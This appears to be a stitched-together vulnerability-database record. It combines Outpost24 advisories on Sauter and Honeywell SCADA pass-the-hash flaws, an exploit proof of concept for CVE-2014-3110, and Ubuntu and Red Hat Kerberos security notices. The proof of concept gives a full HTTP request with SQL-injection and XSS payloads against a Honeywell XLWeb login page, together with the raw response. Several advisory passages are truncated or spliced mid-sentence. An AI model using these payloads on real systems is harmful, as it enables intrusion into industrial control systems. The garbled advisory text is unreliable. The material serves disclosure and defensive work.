References (Source)
---------------
This advisory:
https://www.outpost24.com/critical-scada-vulnerabilities-sauter-moduweb/
ICS CERT:
https://ics-cert.us-cert.gov/advisories/ICSA-16-033-01
Summary of the issues
---------------
In short \x96 By obtaining access to a system using undocumented accounts,
it is possible to obtain a low privilege level.
By exploiting the fact that the cashed credentials used for the
\x93remember me\x94 function of the web application employ the same encryption
as the one used for protection of passwords included in backups, a user
can elevate privileges to administrator level.
The backups also contain other encrypted configuration information which
can further an attacker\x92s access to also affect for example email
accounts used for notifications.
By accessing the system as an administrator, an attacker can obtain
those credentials in plain text from the system as they are included in
the configuration details, protected only by the use of \x93password\x94
field-types in the forms.
In essence this constitute a pass the hash vulnerability. Just as with
https://www.outpost24.com/cve-2014-2717-attacking-the-honeywell-falcon-xlweb/
which used hashed inputs to generate secure transfer of credentials over
non encrypted connections, applying the same protection scheme to its
stored, and exposed, secrets.
Don\x92t do your own cryptography.
A bit more details, sufficient for the interested reader to recreate but
not a straight forward guide, available at the provided references.
Martin Jartelius \x96 CSO \x96 Outpost24
John Stock \x96 Technology Program Director \x96 Outpost24
. After giving the market two extra months for patching and also
contacting some of the affected national CERTs Outpost24 today released
the vulnerability details for CVE-2014-2717.
This vulnerability consists of a missing access restriction in
combination with a flawed login function, resulting in something as
exotic as a pass the hash vulnerability to authenticate with a SCADA
system, giving administrative access.*
*TL;DR; The Honeywell Falcon (XLWeb Linux/Webserver) contains a
vulnerability which allows anyone, even without knowing the username or
password, to log in as an administrator in the system. Although
information regarding the presence of the vulnerability has been
available for a few months since its open disclosure by the ISC CERT to
member organizations, there are multiple unpatched systems that remain
exposed to the Internet. Outpost24 have waited for an airport we were
aware of were affected to patch before releasing.
The more full information is available here;
http://www.outpost24.com/cve-2014-2717-attacking-the-honeywell-falcon-xlweb/
References:
https://ics-cert.us-cert.gov/advisories/ICSA-14-175-01
CVE-2014-2717
AFFECTED PRODUCTS
The following Honeywell FALCON XLWeb controller versions are affected:
* FALCON Linux 2.04.01 or older
* FALCON XLWebExe 2.02.11 or older.
The impact to individual organizations depends on many factors that are
unique to each organization. ICS-CERT recommends that organizations
evaluate the impact of this vulnerability based on their operational
environment, architecture and product implementation.
The affected products, FALCON XLWeb controllers, are web-based SCADA
systems. According to Honeywell, FALCON XLWeb controllers are deployed
across several industries including critical manufacturing, energy and
wastewater systems among others. According to Honeywell, the affected
controllers are used by customers primarily in Europe and the Middle East.
Outpost24 would like to direct a thank you to Honeywell and ICS CERT for
their fast work in resolving the problems, and we also completely share
the vendors recommendation that SCADA systems already in the first place
should not be internet facing. The vendor have been a pleasure to work
with and have taken every care to resolve the issue timely.
Martin Jartelius
CSO
Outpost24
www.outpost24.com
| VAR-201407-0468 | CVE-2014-3110 | Honeywell FALCON XLWeb Linux Controller and FALCON XLWeb XLWebExe Controller cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities on Honeywell FALCON XLWeb Linux controller devices 2.04.01 and earlier and FALCON XLWeb XLWebExe controller devices 2.02.11 and earlier allow remote attackers to inject arbitrary web script or HTML via invalid input. Honeywell is a manufacturing company focused on automation control.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. # Exploit Title: Honeywell XL Web Controller SQLi & XSS
# Date: 2018-05-24
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.honeywell.com
# Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB
104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O,
XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL,
XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL.
# Tested on: Linux
# CVE: CVE-2014-3110
--------------- ---> Proof Of Concept <--------------------------
POST /standard/mainframe.php HTTP/1.1
Cache-Control: no-cache
Referer: http://TargetIP/standard/mainframe.php
Accept: text/xml,application/xml,application/xhtml+xml,text/
html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: Locale=1033
Accept-Encoding: gzip, deflate
Content-Length: 222
Content-Type: application/x-www-form-urlencoded
SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/><svg/
onload=prompt(/XSS/)>
&LoginPasswordMD5=&LoginCommand=&LoginPassword=&
rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest
HTTP/1.1 200 OK
Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02
GMT; path=/
Server: Apache/1.3.23 (Unix) PHP/4.4.9
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 24 May 2018 08:54:03 GMT
<br />
<b>Warning</b>: xw_get_users() expects parameter 1 to be long, string
given in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>97</b><br />
<br />
<b>Warning</b>: xml_load_texts_file() expects parameter 2 to be long,
string given in <b>/mnt/mtd6/xlweb/web/standard/include/elements.php</b> on
line <b>247</b><br />
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv="expires" content="0"/>
<link rel="stylesheet" href="include/honeywell.css"/>
<title><br />
<b>Notice</b>: Undefined index: HeadTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>300</b><br />
</title>
<script language="JavaScript">
<!--
var NS4 = document.layers;
// if the selected element has alarms, the element within the
// drop Down-list should be styled red.
// This is done for firefox which does not accept even the
// usage of inline styles.
function setOptionColor() {
if(document.getElementById("LoginSelect") != null) {
var selectionBox = document.getElementById("LoginSelect");
var selectedElement = selectionBox.selectedIndex;
var selectedOption = selectionBox.options[selectedElement];
if(selectedOption.getAttribute("class") != null) {
var className = selectedOption.getAttribute("class");
if(className == "red") {
selectionBox.style.color = "#FF0000";
}
}
}
}
function onSessionChange (sSessionID, sLocaleID)
{
document.forms.main.elements["SessionID"].value = sSessionID;
document.forms.main.elements["LocaleID"].value = sLocaleID;
submitCommand ("ChangeSession");
}
function onDeviceListChange ()
{
submitCommand ("UpdateDeviceList");
}
function onSessionCreated (sResult, sSessionID)
{
if (sResult != "4194561")
{
if (sResult == "196626")
{
alert ("<br />
*<b>Notice</b>: Undefined index: CreateSessionFailed in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>346</b><br />*
*\n" +*
"\n" +
"<br />
*<b>Notice</b>: Undefined index: TooManyUsers in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>348</b><br />*
*");*
}
else
{
alert ("<br />
*<b>Notice</b>: Undefined index: CreateSessionFailed in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>352</b><br />*
*\n" +*
"\n" +
"<br />
*<b>Notice</b>: Undefined index: OperationalProblem in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>354</b><br />*
*");*
}
return;
}
var sUserName = document.forms.main.elements["LoginUserName"].value;
var sPassword = calcMD5 (document.forms.main.elements[
"LoginPassword"].value);
sPassword = calcMD5 (sSessionID + sUserName + sPassword);
sUserName = calcMD5 (sUserName);
document.forms.main.elements["LoginSessionID"].value = sSessionID;
document.forms.main.elements["LoginUserNameMD5"].value = sUserName;
document.forms.main.elements["LoginPasswordMD5"].value = sPassword;
submitCommand ("Login");
}
function showHelp (sHelpID)
{
var lWidth = 360;
var lHeight = 320;
var lLeft = (screen.width - lWidth) / 2;
var lTop = (screen.height - lHeight) / 2;
openDependent (*"login/help.php?Locale="/><svg/onload=prompt(/XSS/)>*
&ID=" + sHelpID,
"Help",
"width=" + lWidth + ",height=" + lHeight + ",left=" +
lLeft + ",top=" + lTop + ",scrollbars=yes,resizable=yes");
}
function submitCommand (sCommand)
{
//document.forms.main.elements["LoginPassword"].value = "";
document.forms.main.elements["LoginCommand"].value = sCommand;
document.forms.main.submit ();
}
function checkEnter (event)
{
var lkeyCode = 0;
if (NS4)
{
lkeyCode = event.which;
}
else
{
lkeyCode = event.keyCode;
}
if (lkeyCode == 13)
{
createSession ();
}
}
function changeDevice ()
{
var oOptions = document.forms.main.elements["
LoginDevice"].options;
for (var lIndex = 0; lIndex < oOptions.length; lIndex++)
{
if (oOptions[lIndex].selected)
{
var sURL = "http://" + oOptions[lIndex].value;
sURL += ":80";
sURL += "/standard/";
sURL += "default.php?Locale="/><svg/onload=prompt(/XSS/)>
";
parent.parent.window.location.replace (sURL);
return;
}
}
}
function createSession ()
{
if (top.frames.updateframe &&
top.frames.updateframe.createSession)
{
top.frames.updateframe.createSession ();
}
else
{
var lLeft = screen.width;
var lTop = screen.height;
var oWindow = open ("login/session.php",
"Session",
"width=0,height=0,left=" + lLeft + ",top=" +
lTop + ",dependent=yes,locationbar=no,menubar=no,status=no,scrollbars=no");
}
}
function onLoad ()
{
if (top.frames.updateframe)
{
top.frames.updateframe.location.replace ("login/update.php");
}
document.main.LoginUserName.focus ();
}
//-->
</script>
<script type="text/javascript" src="scripts/md5.js"></script>
</head>
<body onload="setOptionColor()" class="colored" onLoad="onLoad ();"
style="background-image: url(images/bg_headline_dialog.gif);
background-repeat:repeat-x;">
<form name="main" method="post" action="/standard/mainframe.php">
<input type="hidden" name="SessionID"/>
<input type="hidden" name="LocaleID" value="'"--></
style></scRipt><scRipt>netsparker(0x0001AA)</scRipt>"/>
<input type="hidden" name="rememberMeCheck" value=""/>
<input type="hidden" name="LoginSessionID"/>
<input type="hidden" name="LoginUserNameMD5"/>
<input type="hidden" name="LoginPasswordMD5"/>
<input type="hidden" name="LoginCommand"/>
<!-- *******************************************************************
-->
<!-- * Controller Name
* -->
<!-- *******************************************************************
-->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr><td bgcolor="#7F7F7F"><img alt=""
src="images/blank.gif" width="1" height="1"/></td></tr>
<tr><td bgcolor="#000000"><img alt="" src="images/blank.gif"
width="1" height="1"/></td></tr>
<tr>
<td class="headline" height="16" nowrap="">
AUM0_MUSEO_LANA.XLWEB_MUSEO_LANA.<br />
<b>Notice</b>: Undefined index: Title in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>509</b><br />
</td>
</tr>
</table>
<table width="100%" height="75%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td width="50%"> </td>
<td>
<table border="0" cellspacing="7" cellpadding="0">
<!-- ******************************
************************************* -->
<!-- * Custom image
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td align="center">
<img alt="" src="login/loginlogo.gif"
/>
</td>
</tr>
<tr><td><img alt="" src="images/blank.gif" width="1"
height="7"/></td></tr>
</table>
</td>
</tr>
<!-- ******************************
************************************* -->
<!-- * Login group
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<br />
<b>Notice</b>: Undefined index: Login in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>596</b><br />
<br />
<b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>597</b><br />
<table width="100%" border="0" cellspacing="0" cellpadding="0"
bgcolor="#B8D7F0">
<tr>
<td><img alt="" src="images/group_left_top.gif" width="5"
height="5"/></td>
<td><img alt="" src="images/blank.gif" width="1" height="5"/></td>
<td align="right"><img alt="" src="images/group_right_top.gif"
width="5" height="5"/></td>
</tr>
<tr>
<td><img alt="" src="images/blank.gif" width="5" height="1"/></td>
<td width="100%" valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td colspan="2" class="groupheader" nowrap="">
<b></b>
</td>
<td align="right">
</td>
</tr>
<tr>
<td> </td>
<td width="100%">
<table border="0" cellpadding="1" cellspacing="1">
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: Controller in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>605</b><br />
: </td>
<td>
<select id="LoginSelect" class="loginSelect"
name="LoginDevice" onchange="changeDevice ();" style="width:150px;">
<option
selected="" value="192.168.1.12"
class="red" style="color:#FF0000;
background-color:#D8E8F8">
XLWEB_MUSEO_LANA
</option>
</select>
</td>
<td> </td>
<td align="right">
<img alt="" name="LoginAlarm"
src="footer/alarm_red_tr.gif"> </td>
</tr>
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: UserName in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>632</b><br />
: </td>
<td>
<select name="LoginUserName" style="width:150px;">
<br />
<b>Warning</b>: Invalid argument supplied for foreach() in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>650</b><br />
</select>
</td>
</tr>
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: Password in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>689</b><br />
: </td>
<td>
<!--<input type="password" class="text" name="LoginPassword"
style="width:150px;" onKeyPress="checkEnter (event)"/>-->
<input name="LoginPassword" type="password" onKeyDown="checkEnter (event)"
size="25" class="ppinput" value=""/>
</td>
</tr>
<tr>
<td><br />
<b>Notice</b>: Undefined index: RememberMeCheckbox in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>720</b><br />
</td>
<td><input id="rememberMeCheck" name="rememberMeCheck" type="checkbox"
/></td>
</tr>
<tr>
<td><img alt="" src="images/blank.gif" width="90"
height="2"/></td>
<td><img alt="" src="images/blank.gif" width="1"
height="2"/></td>
</tr>
</table>
</td>
<td> </td>
</tr>
</table>
</td>
<td><img alt="" src="images/blank.gif" width="5" height="1"/></td>
</tr>
<tr>
<td><img alt="" src="images/group_left_bottom.gif" width="5"
height="5"/></td>
<td><img alt="" src="images/blank.gif" width="1" height="5"/></td>
<td align="right"><img alt="" src="images/group_right_bottom.gif"
width="5" height="5"/></td>
</tr>
</table>
</td>
</tr>
<!-- ******************************
************************************* -->
<!-- * Button
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<table border="0" cellspacing="7" cellpadding="0">
<tr>
<td>
<br />
<b>Notice</b>: Undefined index: LoginButton in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>750</b><br />
<br />
<b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>751</b><br />
<table border="0" cellspacing="0" cellpadding="0" >
<tr>
<td><img alt="" src="images/buttonleft.gif" width="7"
height="18"/></td>
<td background="images/buttonmiddle.gif" nowrap=""><a
class="button" href="JavaScript:createSession ();" title=""></a></td>
<td><img alt="" src="images/buttonright.gif" width="7"
height="18"/></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td width="50%"> </td>
</tr>
</table>
</form>
</body>
</html>
| VAR-201408-0299 | CVE-2014-4344 | MIT Kerberos 5 of lib/gssapi/spnego/spnego_mech.c of SPNEGO Asceptor's acc_ctx_cont Service disruption in functions (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The acc_ctx_cont function in the SPNEGO acceptor in lib/gssapi/spnego/spnego_mech.c in MIT Kerberos 5 (aka krb5) 1.5.x through 1.12.x before 1.12.2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty continuation token at a certain point during a SPNEGO negotiation. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause a program to crash, resulting in denial-of-service conditions.
Versions prior to Kerberos 5 1.12.2 are vulnerable.
CVE-2014-4343
An unauthenticated remote attacker with the ability to spoof packets
appearing to be from a GSSAPI acceptor can cause a double-free
condition in GSSAPI initiators (clients) which are using the SPNEGO
mechanism, by returning a different underlying mechanism than was
proposed by the initiator.
For the stable distribution (wheezy), these problems have been fixed in
version 1.10.1+dfsg-5+deb7u2.
For the unstable distribution (sid), these problems have been fixed in
version 1.12.1+dfsg-7. ==========================================================================
Ubuntu Security Notice USN-2310-1
August 11, 2014
krb5 vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Kerberos. This issue only affected Ubuntu
12.04 LTS. This
issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected
Ubuntu 10.04 LTS and Ubuntu 12.04 LTS.
This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS.
(CVE-2014-4344)
Tomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon
incorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 14.04 LTS:
krb5-admin-server 1.12+dfsg-2ubuntu4.2
krb5-kdc 1.12+dfsg-2ubuntu4.2
krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2
krb5-otp 1.12+dfsg-2ubuntu4.2
krb5-pkinit 1.12+dfsg-2ubuntu4.2
krb5-user 1.12+dfsg-2ubuntu4.2
libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2
libgssrpc4 1.12+dfsg-2ubuntu4.2
libk5crypto3 1.12+dfsg-2ubuntu4.2
libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2
libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2
libkdb5-7 1.12+dfsg-2ubuntu4.2
libkrad0 1.12+dfsg-2ubuntu4.2
libkrb5-3 1.12+dfsg-2ubuntu4.2
libkrb5support0 1.12+dfsg-2ubuntu4.2
Ubuntu 12.04 LTS:
krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5
krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5
krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5
krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5
krb5-user 1.10+dfsg~beta1-2ubuntu0.5
libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5
libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5
libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5
libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5
libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5
libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5
libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5
libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5
Ubuntu 10.04 LTS:
krb5-admin-server 1.8.1+dfsg-2ubuntu0.13
krb5-kdc 1.8.1+dfsg-2ubuntu0.13
krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13
krb5-pkinit 1.8.1+dfsg-2ubuntu0.13
krb5-user 1.8.1+dfsg-2ubuntu0.13
libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13
libgssrpc4 1.8.1+dfsg-2ubuntu0.13
libk5crypto3 1.8.1+dfsg-2ubuntu0.13
libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13
libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13
libkdb5-4 1.8.1+dfsg-2ubuntu0.13
libkrb5-3 1.8.1+dfsg-2ubuntu0.13
libkrb5support0 1.8.1+dfsg-2ubuntu0.13
In general, a standard system update will make all the necessary changes. The verification
of md5 checksums and GPG signatures is performed automatically for you. (CVE-2014-4341)
This update also fixes the following bugs:
* Prior to this update, the libkrb5 library occasionally attempted to free
already freed memory when encrypting credentials. As a consequence, the
calling process terminated unexpectedly with a segmentation fault.
With this update, libkrb5 frees memory correctly, which allows the
credentials to be encrypted appropriately and thus prevents the mentioned
crash. (BZ#1004632)
* Previously, when the krb5 client library was waiting for a response from
a server, the timeout variable in certain cases became a negative number.
Consequently, the client could enter a loop while checking for responses.
With this update, the client logic has been modified and the described
error no longer occurs. After installing the
updated packages, the krb5kdc daemon will be restarted automatically. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: krb5 security, bug fix and enhancement update
Advisory ID: RHSA-2015:0439-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html
Issue date: 2015-03-05
CVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343
CVE-2014-4344 CVE-2014-4345 CVE-2014-5352
CVE-2014-5353 CVE-2014-9421 CVE-2014-9422
CVE-2014-9423
=====================================================================
1. Summary:
Updated krb5 packages that fix multiple security issues, several bugs, and
add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
Kerberos is a networked authentication system which allows clients and
servers to authenticate to each other with the help of a trusted third
party, the Kerberos KDC.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. A remote, unauthenticated attacker could
use this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)
A buffer overflow was found in the KADM5 administration server (kadmind)
when it was used with an LDAP back end for the KDC database. A remote,
authenticated attacker could potentially use this flaw to execute arbitrary
code on the system running kadmind. (CVE-2014-4345)
A use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5
library processed valid context deletion tokens. An attacker able to make
an application using the GSS-API library (libgssapi) call the
gss_process_context_token() function could use this flaw to crash that
application. (CVE-2014-5352)
If kadmind were used with an LDAP back end for the KDC database, a remote,
authenticated attacker with the permissions to set the password policy
could crash kadmind by attempting to use a named ticket policy object as a
password policy for a principal. (CVE-2014-5353)
A double-free flaw was found in the way MIT Kerberos handled invalid
External Data Representation (XDR) data. An authenticated user could use
this flaw to crash the MIT Kerberos administration server (kadmind), or
other applications using Kerberos libraries, using specially crafted XDR
packets. (CVE-2014-9421)
It was found that the MIT Kerberos administration server (kadmind)
incorrectly accepted certain authentication requests for two-component
server principal names. A remote attacker able to acquire a key with a
particularly named principal (such as "kad/x") could use this flaw to
impersonate any user to kadmind, and perform administrative actions as that
user. (CVE-2014-9422)
An information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS
implementation (libgssrpc) handled certain requests. An attacker could send
a specially crafted request to an application using libgssrpc to disclose a
limited portion of uninitialized memory used by that application.
(CVE-2014-9423)
Two buffer over-read flaws were found in the way MIT Kerberos handled
certain requests. A remote, unauthenticated attacker able to inject packets
into a client or server application's GSSAPI session could use either of
these flaws to crash the application. An
attacker able to spoof packets to appear as though they are from an GSSAPI
acceptor could use this flaw to crash a client application that uses MIT
Kerberos. (CVE-2014-4343)
Red Hat would like to thank the MIT Kerberos project for reporting the
CVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT
Kerberos project acknowledges Nico Williams for helping with the analysis
of CVE-2014-5352.
The krb5 packages have been upgraded to upstream version 1.12, which
provides a number of bug fixes and enhancements, including:
* Added plug-in interfaces for principal-to-username mapping and verifying
authorization to user accounts.
* When communicating with a KDC over a connected TCP or HTTPS socket, the
client gives the KDC more time to reply before it transmits the request to
another server. (BZ#1049709, BZ#1127995)
This update also fixes multiple bugs, for example:
* The Kerberos client library did not recognize certain exit statuses that
the resolver libraries could return when looking up the addresses of
servers configured in the /etc/krb5.conf file or locating Kerberos servers
using DNS service location. The library could treat non-fatal return codes
as fatal errors. Now, the library interprets the specific return codes
correctly. (BZ#1084068, BZ#1109102)
In addition, this update adds various enhancements. Among others:
* Added support for contacting KDCs and kpasswd servers through HTTPS
proxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)
4. Solution:
All krb5 users are advised to upgrade to these updated packages, which
correct these issues and add these enhancements.
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1084068 - ipv6 address handling in krb5.conf
1102837 - Please backport improved GSSAPI mech configuration
1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly
1109919 - Backport https support into libkrb5
1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext
1118347 - ksu non-functional, gets invalid argument copying cred cache
1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens
1121789 - CVE-2014-4343: use-after-free crash in SPNEGO
1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators
1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens
1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure
1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001)
1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update
1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name
1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001)
1179857 - CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001)
1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001)
1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001)
1184629 - kinit loops on principals on unknown error
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
ppc64:
krb5-debuginfo-1.12.2-14.el7.ppc.rpm
krb5-debuginfo-1.12.2-14.el7.ppc64.rpm
krb5-devel-1.12.2-14.el7.ppc.rpm
krb5-devel-1.12.2-14.el7.ppc64.rpm
krb5-libs-1.12.2-14.el7.ppc.rpm
krb5-libs-1.12.2-14.el7.ppc64.rpm
krb5-pkinit-1.12.2-14.el7.ppc64.rpm
krb5-server-1.12.2-14.el7.ppc64.rpm
krb5-server-ldap-1.12.2-14.el7.ppc64.rpm
krb5-workstation-1.12.2-14.el7.ppc64.rpm
s390x:
krb5-debuginfo-1.12.2-14.el7.s390.rpm
krb5-debuginfo-1.12.2-14.el7.s390x.rpm
krb5-devel-1.12.2-14.el7.s390.rpm
krb5-devel-1.12.2-14.el7.s390x.rpm
krb5-libs-1.12.2-14.el7.s390.rpm
krb5-libs-1.12.2-14.el7.s390x.rpm
krb5-pkinit-1.12.2-14.el7.s390x.rpm
krb5-server-1.12.2-14.el7.s390x.rpm
krb5-server-ldap-1.12.2-14.el7.s390x.rpm
krb5-workstation-1.12.2-14.el7.s390x.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
krb5-libs-1.12.2-14.el7.i686.rpm
krb5-libs-1.12.2-14.el7.x86_64.rpm
krb5-pkinit-1.12.2-14.el7.x86_64.rpm
krb5-server-1.12.2-14.el7.x86_64.rpm
krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
krb5-1.12.2-14.el7.src.rpm
x86_64:
krb5-debuginfo-1.12.2-14.el7.i686.rpm
krb5-debuginfo-1.12.2-14.el7.x86_64.rpm
krb5-devel-1.12.2-14.el7.i686.rpm
krb5-devel-1.12.2-14.el7.x86_64.rpm
